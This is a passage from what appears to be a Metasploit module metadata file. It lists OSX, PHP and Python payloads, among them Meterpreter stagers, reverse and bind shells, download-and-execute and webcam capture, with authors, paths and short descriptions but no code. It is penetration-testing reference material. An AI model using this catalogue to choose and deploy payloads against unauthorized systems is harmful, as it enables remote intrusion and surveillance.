"type": "payload",
"author": [
"parchedmind",
"nologic",
"timwr",
"nemo <nemo@felinemenace.org>"
],
"description": "Inject the mettle server payload (staged). Listen, read length, read buffer, execute",
"references": [
"URL-https://github.com/CylanceVulnResearch/osx_runbin",
"URL-https://github.com/nologic/shellcc"
],
"platform": "OSX",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/osx/x64/bind_tcp.rb",
"is_install_path": true,
"ref_name": "osx/x64/meterpreter/bind_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_osx/x64/meterpreter/reverse_tcp": {
"name": "OSX Meterpreter, Reverse TCP Stager",
"full_name": "payload/osx/x64/meterpreter/reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"parchedmind",
"nologic",
"timwr",
"nemo <nemo@felinemenace.org>"
],
"description": "Inject the mettle server payload (staged). Connect, read length, read buffer, execute",
"references": [
"URL-https://github.com/CylanceVulnResearch/osx_runbin",
"URL-https://github.com/nologic/shellcc"
],
"platform": "OSX",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-01-10 15:06:08 +0000",
"path": "/modules/payloads/stagers/osx/x64/reverse_tcp.rb",
"is_install_path": true,
"ref_name": "osx/x64/meterpreter/reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_osx/x64/meterpreter_reverse_http": {
"name": "OSX Meterpreter, Reverse HTTP Inline",
"full_name": "payload/osx/x64/meterpreter_reverse_http",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Adam Cammack <adam_cammack@rapid7.com>",
"Brent Cook <brent_cook@rapid7.com>",
"timwr"
],
"description": "Run the Meterpreter / Mettle server payload (stageless)",
"references": [
],
"platform": "OSX",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-04-11 09:43:17 +0000",
"path": "/modules/payloads/singles/osx/x64/meterpreter_reverse_http.rb",
"is_install_path": true,
"ref_name": "osx/x64/meterpreter_reverse_http",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_osx/x64/meterpreter_reverse_https": {
"name": "OSX Meterpreter, Reverse HTTPS Inline",
"full_name": "payload/osx/x64/meterpreter_reverse_https",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Adam Cammack <adam_cammack@rapid7.com>",
"Brent Cook <brent_cook@rapid7.com>",
"timwr"
],
"description": "Run the Meterpreter / Mettle server payload (stageless)",
"references": [
],
"platform": "OSX",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-04-11 09:43:17 +0000",
"path": "/modules/payloads/singles/osx/x64/meterpreter_reverse_https.rb",
"is_install_path": true,
"ref_name": "osx/x64/meterpreter_reverse_https",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_osx/x64/meterpreter_reverse_tcp": {
"name": "OSX Meterpreter, Reverse TCP Inline",
"full_name": "payload/osx/x64/meterpreter_reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Adam Cammack <adam_cammack@rapid7.com>",
"Brent Cook <brent_cook@rapid7.com>",
"timwr"
],
"description": "Run the Meterpreter / Mettle server payload (stageless)",
"references": [
],
"platform": "OSX",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-04-11 09:43:17 +0000",
"path": "/modules/payloads/singles/osx/x64/meterpreter_reverse_tcp.rb",
"is_install_path": true,
"ref_name": "osx/x64/meterpreter_reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_osx/x64/say": {
"name": "OS X x64 say Shellcode",
"full_name": "payload/osx/x64/say",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"nemo <nemo@felinemenace.org>"
],
"description": "Say an arbitrary string outloud using Mac OS X text2speech",
"references": [
],
"platform": "OSX",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/osx/x64/say.rb",
"is_install_path": true,
"ref_name": "osx/x64/say",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_osx/x64/shell_bind_tcp": {
"name": "OS X x64 Shell Bind TCP",
"full_name": "payload/osx/x64/shell_bind_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"nemo <nemo@felinemenace.org>"
],
"description": "Bind an arbitrary command to an arbitrary port",
"references": [
],
"platform": "OSX",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/osx/x64/shell_bind_tcp.rb",
"is_install_path": true,
"ref_name": "osx/x64/shell_bind_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_osx/x64/shell_find_tag": {
"name": "OSX Command Shell, Find Tag Inline",
"full_name": "payload/osx/x64/shell_find_tag",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"nemo <nemo@felinemenace.org>"
],
"description": "Spawn a shell on an established connection (proxy/nat safe)",
"references": [
],
"platform": "OSX",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/osx/x64/shell_find_tag.rb",
"is_install_path": true,
"ref_name": "osx/x64/shell_find_tag",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_osx/x64/shell_reverse_tcp": {
"name": "OS X x64 Shell Reverse TCP",
"full_name": "payload/osx/x64/shell_reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"nemo <nemo@felinemenace.org>"
],
"description": "Connect back to attacker and spawn a command shell",
"references": [
],
"platform": "OSX",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/osx/x64/shell_reverse_tcp.rb",
"is_install_path": true,
"ref_name": "osx/x64/shell_reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_osx/x86/bundleinject/bind_tcp": {
"name": "Mac OS X Inject Mach-O Bundle, Bind TCP Stager",
"full_name": "payload/osx/x86/bundleinject/bind_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"ddz <ddz@theta44.org>"
],
"description": "Inject a custom Mach-O bundle into the exploited process. Listen, read length, read buffer, execute",
"references": [
],
"platform": "OSX",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/osx/x86/bind_tcp.rb",
"is_install_path": true,
"ref_name": "osx/x86/bundleinject/bind_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_osx/x86/bundleinject/reverse_tcp": {
"name": "Mac OS X Inject Mach-O Bundle, Reverse TCP Stager",
"full_name": "payload/osx/x86/bundleinject/reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"ddz <ddz@theta44.org>"
],
"description": "Inject a custom Mach-O bundle into the exploited process. Connect, read length, read buffer, execute",
"references": [
],
"platform": "OSX",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/osx/x86/reverse_tcp.rb",
"is_install_path": true,
"ref_name": "osx/x86/bundleinject/reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_osx/x86/exec": {
"name": "OS X Execute Command",
"full_name": "payload/osx/x86/exec",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"snagg <snagg@openssl.it>",
"argp <argp@census-labs.com>",
"joev <joev@metasploit.com>"
],
"description": "Execute an arbitrary command",
"references": [
],
"platform": "OSX",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/osx/x86/exec.rb",
"is_install_path": true,
"ref_name": "osx/x86/exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_osx/x86/isight/bind_tcp": {
"name": "Mac OS X x86 iSight Photo Capture, Bind TCP Stager",
"full_name": "payload/osx/x86/isight/bind_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"ddz <ddz@theta44.org>"
],
"description": "Inject a Mach-O bundle to capture a photo from the iSight (staged). Listen, read length, read buffer, execute",
"references": [
],
"platform": "OSX",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/osx/x86/bind_tcp.rb",
"is_install_path": true,
"ref_name": "osx/x86/isight/bind_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_osx/x86/isight/reverse_tcp": {
"name": "Mac OS X x86 iSight Photo Capture, Reverse TCP Stager",
"full_name": "payload/osx/x86/isight/reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"ddz <ddz@theta44.org>"
],
"description": "Inject a Mach-O bundle to capture a photo from the iSight (staged). Connect, read length, read buffer, execute",
"references": [
],
"platform": "OSX",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/osx/x86/reverse_tcp.rb",
"is_install_path": true,
"ref_name": "osx/x86/isight/reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_osx/x86/shell_bind_tcp": {
"name": "OS X Command Shell, Bind TCP Inline",
"full_name": "payload/osx/x86/shell_bind_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Ramon de C Valle <rcvalle@metasploit.com>"
],
"description": "Listen for a connection and spawn a command shell",
"references": [
],
"platform": "OSX",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-05-01 04:57:42 +0000",
"path": "/modules/payloads/singles/osx/x86/shell_bind_tcp.rb",
"is_install_path": true,
"ref_name": "osx/x86/shell_bind_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_osx/x86/shell_find_port": {
"name": "OS X Command Shell, Find Port Inline",
"full_name": "payload/osx/x86/shell_find_port",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Ramon de C Valle <rcvalle@metasploit.com>"
],
"description": "Spawn a shell on an established connection",
"references": [
],
"platform": "OSX",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-05-01 04:57:42 +0000",
"path": "/modules/payloads/singles/osx/x86/shell_find_port.rb",
"is_install_path": true,
"ref_name": "osx/x86/shell_find_port",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_osx/x86/shell_reverse_tcp": {
"name": "OS X Command Shell, Reverse TCP Inline",
"full_name": "payload/osx/x86/shell_reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Ramon de C Valle <rcvalle@metasploit.com>"
],
"description": "Connect back to attacker and spawn a command shell",
"references": [
],
"platform": "OSX",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-05-01 04:57:42 +0000",
"path": "/modules/payloads/singles/osx/x86/shell_reverse_tcp.rb",
"is_install_path": true,
"ref_name": "osx/x86/shell_reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_osx/x86/vforkshell/bind_tcp": {
"name": "OS X (vfork) Command Shell, Bind TCP Stager",
"full_name": "payload/osx/x86/vforkshell/bind_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"ddz <ddz@theta44.org>"
],
"description": "Call vfork() if necessary and spawn a command shell (staged). Listen, read length, read buffer, execute",
"references": [
],
"platform": "OSX",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/osx/x86/bind_tcp.rb",
"is_install_path": true,
"ref_name": "osx/x86/vforkshell/bind_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_osx/x86/vforkshell/reverse_tcp": {
"name": "OS X (vfork) Command Shell, Reverse TCP Stager",
"full_name": "payload/osx/x86/vforkshell/reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"ddz <ddz@theta44.org>"
],
"description": "Call vfork() if necessary and spawn a command shell (staged). Connect, read length, read buffer, execute",
"references": [
],
"platform": "OSX",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/osx/x86/reverse_tcp.rb",
"is_install_path": true,
"ref_name": "osx/x86/vforkshell/reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_osx/x86/vforkshell_bind_tcp": {
"name": "OS X (vfork) Command Shell, Bind TCP Inline",
"full_name": "payload/osx/x86/vforkshell_bind_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"ddz <ddz@theta44.org>"
],
"description": "Listen for a connection, vfork if necessary, and spawn a command shell",
"references": [
],
"platform": "OSX",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/osx/x86/vforkshell_bind_tcp.rb",
"is_install_path": true,
"ref_name": "osx/x86/vforkshell_bind_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_osx/x86/vforkshell_reverse_tcp": {
"name": "OS X (vfork) Command Shell, Reverse TCP Inline",
"full_name": "payload/osx/x86/vforkshell_reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"ddz <ddz@theta44.org>"
],
"description": "Connect back to attacker, vfork if necessary, and spawn a command shell",
"references": [
],
"platform": "OSX",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/osx/x86/vforkshell_reverse_tcp.rb",
"is_install_path": true,
"ref_name": "osx/x86/vforkshell_reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_php/bind_perl": {
"name": "PHP Command Shell, Bind TCP (via Perl)",
"full_name": "payload/php/bind_perl",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Samy <samy@samy.pl>",
"cazz <bmc@shmoo.com>"
],
"description": "Listen for a connection and spawn a command shell via perl (persistent)",
"references": [
],
"platform": "PHP",
"arch": "php",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/php/bind_perl.rb",
"is_install_path": true,
"ref_name": "php/bind_perl",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_php/bind_perl_ipv6": {
"name": "PHP Command Shell, Bind TCP (via perl) IPv6",
"full_name": "payload/php/bind_perl_ipv6",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Samy <samy@samy.pl>",
"cazz <bmc@shmoo.com>"
],
"description": "Listen for a connection and spawn a command shell via perl (persistent) over IPv6",
"references": [
],
"platform": "PHP",
"arch": "php",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/php/bind_perl_ipv6.rb",
"is_install_path": true,
"ref_name": "php/bind_perl_ipv6",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_php/bind_php": {
"name": "PHP Command Shell, Bind TCP (via PHP)",
"full_name": "payload/php/bind_php",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"egypt <egypt@metasploit.com>",
"diaul <diaul@devilopers.org>"
],
"description": "Listen for a connection and spawn a command shell via php",
"references": [
],
"platform": "PHP",
"arch": "php",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/php/bind_php.rb",
"is_install_path": true,
"ref_name": "php/bind_php",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_php/bind_php_ipv6": {
"name": "PHP Command Shell, Bind TCP (via php) IPv6",
"full_name": "payload/php/bind_php_ipv6",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"egypt <egypt@metasploit.com>",
"diaul <diaul@devilopers.org>"
],
"description": "Listen for a connection and spawn a command shell via php (IPv6)",
"references": [
],
"platform": "PHP",
"arch": "php",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/php/bind_php_ipv6.rb",
"is_install_path": true,
"ref_name": "php/bind_php_ipv6",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_php/download_exec": {
"name": "PHP Executable Download and Execute",
"full_name": "payload/php/download_exec",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"egypt <egypt@metasploit.com>"
],
"description": "Download an EXE from an HTTP URL and execute it",
"references": [
],
"platform": "PHP",
"arch": "php",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/php/download_exec.rb",
"is_install_path": true,
"ref_name": "php/download_exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_php/exec": {
"name": "PHP Execute Command ",
"full_name": "payload/php/exec",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"egypt <egypt@metasploit.com>"
],
"description": "Execute a single system command",
"references": [
],
"platform": "PHP",
"arch": "php",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-11-21 11:09:13 +0000",
"path": "/modules/payloads/singles/php/exec.rb",
"is_install_path": true,
"ref_name": "php/exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_php/meterpreter/bind_tcp": {
"name": "PHP Meterpreter, Bind TCP Stager",
"full_name": "payload/php/meterpreter/bind_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"egypt <egypt@metasploit.com>"
],
"description": "Run a meterpreter server in PHP. Listen for a connection",
"references": [
],
"platform": "PHP",
"arch": "php",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-09-12 19:23:31 +0000",
"path": "/modules/payloads/stagers/php/bind_tcp.rb",
"is_install_path": true,
"ref_name": "php/meterpreter/bind_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_php/meterpreter/bind_tcp_ipv6": {
"name": "PHP Meterpreter, Bind TCP Stager IPv6",
"full_name": "payload/php/meterpreter/bind_tcp_ipv6",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"egypt <egypt@metasploit.com>"
],
"description": "Run a meterpreter server in PHP. Listen for a connection over IPv6",
"references": [
],
"platform": "PHP",
"arch": "php",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-09-12 19:23:31 +0000",
"path": "/modules/payloads/stagers/php/bind_tcp_ipv6.rb",
"is_install_path": true,
"ref_name": "php/meterpreter/bind_tcp_ipv6",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_php/meterpreter/bind_tcp_ipv6_uuid": {
"name": "PHP Meterpreter, Bind TCP Stager IPv6 with UUID Support",
"full_name": "payload/php/meterpreter/bind_tcp_ipv6_uuid",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"egypt <egypt@metasploit.com>",
"OJ Reeves"
],
"description": "Run a meterpreter server in PHP. Listen for a connection over IPv6 with UUID Support",
"references": [
],
"platform": "PHP",
"arch": "php",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-09-12 19:23:31 +0000",
"path": "/modules/payloads/stagers/php/bind_tcp_ipv6_uuid.rb",
"is_install_path": true,
"ref_name": "php/meterpreter/bind_tcp_ipv6_uuid",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_php/meterpreter/bind_tcp_uuid": {
"name": "PHP Meterpreter, Bind TCP Stager with UUID Support",
"full_name": "payload/php/meterpreter/bind_tcp_uuid",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"egypt <egypt@metasploit.com>",
"OJ Reeves"
],
"description": "Run a meterpreter server in PHP. Listen for a connection with UUID Support",
"references": [
],
"platform": "PHP",
"arch": "php",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-09-12 19:23:31 +0000",
"path": "/modules/payloads/stagers/php/bind_tcp_uuid.rb",
"is_install_path": true,
"ref_name": "php/meterpreter/bind_tcp_uuid",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_php/meterpreter/reverse_tcp": {
"name": "PHP Meterpreter, PHP Reverse TCP Stager",
"full_name": "payload/php/meterpreter/reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"egypt <egypt@metasploit.com>"
],
"description": "Run a meterpreter server in PHP. Reverse PHP connect back stager with checks for disabled functions",
"references": [
],
"platform": "PHP",
"arch": "php",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-09-12 19:23:31 +0000",
"path": "/modules/payloads/stagers/php/reverse_tcp.rb",
"is_install_path": true,
"ref_name": "php/meterpreter/reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_php/meterpreter/reverse_tcp_uuid": {
"name": "PHP Meterpreter, PHP Reverse TCP Stager",
"full_name": "payload/php/meterpreter/reverse_tcp_uuid",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"egypt <egypt@metasploit.com>",
"OJ Reeves"
],
"description": "Run a meterpreter server in PHP. Reverse PHP connect back stager with checks for disabled functions",
"references": [
],
"platform": "PHP",
"arch": "php",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-09-12 19:23:31 +0000",
"path": "/modules/payloads/stagers/php/reverse_tcp_uuid.rb",
"is_install_path": true,
"ref_name": "php/meterpreter/reverse_tcp_uuid",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_php/meterpreter_reverse_tcp": {
"name": "PHP Meterpreter, Reverse TCP Inline",
"full_name": "payload/php/meterpreter_reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"egypt <egypt@metasploit.com>"
],
"description": "Connect back to attacker and spawn a Meterpreter server (PHP)",
"references": [
],
"platform": "PHP",
"arch": "php",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-10-22 18:20:45 +0000",
"path": "/modules/payloads/singles/php/meterpreter_reverse_tcp.rb",
"is_install_path": true,
"ref_name": "php/meterpreter_reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_php/reverse_perl": {
"name": "PHP Command, Double Reverse TCP Connection (via Perl)",
"full_name": "payload/php/reverse_perl",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"cazz <bmc@shmoo.com>"
],
"description": "Creates an interactive shell via perl",
"references": [
],
"platform": "PHP",
"arch": "php",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/php/reverse_perl.rb",
"is_install_path": true,
"ref_name": "php/reverse_perl",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_php/reverse_php": {
"name": "PHP Command Shell, Reverse TCP (via PHP)",
"full_name": "payload/php/reverse_php",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"egypt <egypt@metasploit.com>"
],
"description": "Reverse PHP connect back shell with checks for disabled functions",
"references": [
],
"platform": "PHP",
"arch": "php",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/php/reverse_php.rb",
"is_install_path": true,
"ref_name": "php/reverse_php",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_php/shell_findsock": {
"name": "PHP Command Shell, Find Sock",
"full_name": "payload/php/shell_findsock",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"egypt <egypt@metasploit.com>"
],
"description": "Spawn a shell on the established connection to\n the webserver. Unfortunately, this payload\n can leave conspicuous evil-looking entries in the\n apache error logs, so it is probably a good idea\n to use a bind or reverse shell unless firewalls\n prevent them from working. The issue this\n payload takes advantage of (CLOEXEC flag not set\n on sockets) appears to have been patched on the\n Ubuntu version of Apache and may not work on\n other Debian-based distributions. Only tested on\n Apache but it might work on other web servers\n that leak file descriptors to child processes.",
"references": [
],
"platform": "PHP",
"arch": "php",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/php/shell_findsock.rb",
"is_install_path": true,
"ref_name": "php/shell_findsock",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_python/meterpreter/bind_tcp": {
"name": "Python Meterpreter, Python Bind TCP Stager",
"full_name": "payload/python/meterpreter/bind_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Spencer McIntyre"
],
"description": "Run a meterpreter server in Python (2.5-2.7 & 3.1-3.6). Listen for a connection",
"references": [
],
"platform": "Python",
"arch": "python",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/python/bind_tcp.rb",
"is_install_path": true,
"ref_name": "python/meterpreter/bind_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_python/meterpreter/bind_tcp_uuid": {
"name": "Python Meterpreter, Python Bind TCP Stager with UUID Support",
"full_name": "payload/python/meterpreter/bind_tcp_uuid",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Spencer McIntyre",
"OJ Reeves"
],
"description": "Run a meterpreter server in Python (2.5-2.7 & 3.1-3.6). Listen for a connection with UUID Support",
"references": [
],
"platform": "Python",
"arch": "python",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/python/bind_tcp_uuid.rb",
"is_install_path": true,
"ref_name": "python/meterpreter/bind_tcp_uuid",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_python/meterpreter/reverse_http": {
"name": "Python Meterpreter, Python Reverse HTTP Stager",
"full_name": "payload/python/meterpreter/reverse_http",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Spencer McIntyre"
],
"description": "Run a meterpreter server in Python (2.5-2.7 & 3.1-3.6). Tunnel communication over HTTP",
"references": [
],
"platform": "Python",
"arch": "python",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/python/reverse_http.rb",
"is_install_path": true,
"ref_name": "python/meterpreter/reverse_http",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_python/meterpreter/reverse_https": {
"name": "Python Meterpreter, Python Reverse HTTPS Stager",
"full_name": "payload/python/meterpreter/reverse_https",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Spencer McIntyre"
],
"description": "Run a meterpreter server in Python (2.5-2.7 & 3.1-3.6). Tunnel communication over HTTP using SSL",
"references": [
],
"platform": "Python",
"arch": "python",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/python/reverse_https.rb",
"is_install_path": true,
"ref_name": "python/meterpreter/reverse_https",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_python/meterpreter/reverse_tcp": {
"name": "Python Meterpreter, Python Reverse TCP Stager",
"full_name": "payload/python/meterpreter/reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Spencer McIntyre"
],
"description": "Run a meterpreter server in Python (2.5-2.7 & 3.1-3.6). Connect back to the attacker",
"references": [
],
"platform": "Python",
"arch": "python",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/python/reverse_tcp.rb",
"is_install_path": true,
"ref_name": "python/meterpreter/reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_python/meterpreter/reverse_tcp_ssl": {
"name": "Python Meterpreter, Python Reverse TCP SSL Stager",
